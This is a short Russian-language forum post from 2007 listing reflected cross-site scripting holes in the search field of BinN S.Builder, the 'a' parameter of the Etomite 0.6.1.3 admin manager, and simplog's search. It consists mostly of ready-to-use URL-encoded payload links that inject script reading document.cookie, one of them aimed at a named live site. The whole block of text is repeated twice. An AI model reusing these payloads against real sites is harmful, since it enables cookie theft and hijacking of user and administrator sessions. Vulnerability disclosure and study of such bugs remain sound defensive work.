Robin_Hood
16.03.2007, 19:51
CMS BinN S.Builder - уязвимо поле "поиск"
пример:
http://cmsobzor.ru/searth.php?search_words=%27%3E%3Cscript%3Ealert%28 document.cookie%29%3C%2Fscript%3E&x=0&y=0
etomite0613
уязвимость в параметре a. Для удачного проведения атаки пользователь должен быть залогинен под админом
http://localhost/etomite0613/etomite0613/manager/index.php?a=17'%3E%3Cscript%3Ealert(document.cooki e)%3C/script%3E
http://localhost/etomite0613/etomite0613/manager/ - дефолтовая админка
http://www.simplog.org - уязвимость в поиске
пример:
http://cmsobzor.ru/searth.php?search_words=%27%3E%3Cscript%3Ealert%28 document.cookie%29%3C%2Fscript%3E&x=0&y=0
etomite0613
уязвимость в параметре a. Для удачного проведения атаки пользователь должен быть залогинен под админом
http://localhost/etomite0613/etomite0613/manager/index.php?a=17'%3E%3Cscript%3Ealert(document.cooki e)%3C/script%3E
http://localhost/etomite0613/etomite0613/manager/ - дефолтовая админка
http://www.simplog.org - уязвимость в поиске